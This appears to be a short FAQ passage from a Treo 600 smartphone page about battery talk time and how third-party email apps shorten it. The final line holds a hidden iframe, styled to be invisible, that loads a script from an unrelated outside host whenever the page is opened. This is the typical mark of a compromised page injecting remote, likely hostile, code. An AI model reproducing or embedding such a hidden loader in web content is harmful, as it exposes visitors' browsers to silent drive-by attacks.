I'm concerned about battery life. How long will the battery last on the Treo 600?

Good question, and perhaps the most important. I asked a HS rep and was told, "Battery life is definately not as much of a concern." Testing has shown that the new lithium ion battery on the 600 has lasted for 6 hours of talk time on GSM and 5 hours on CDMA. Now certainly its become routine for manufacturers to stretch these times quite a bit, but this new battery should at least get you a soilid 4 hours of talk time..... you don't see that too often with smartphones.
Another factor in the duration of a charge is 3rd party applications. When Handspring tests its phones they don't include, say, Business Connection or SnapperMail. These are optional tools that the user may or may not use. Thus, when using these apps, which automatically log onto the web and retrieve your emails and other apps that work similarly, battery time can be reduced significantly.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
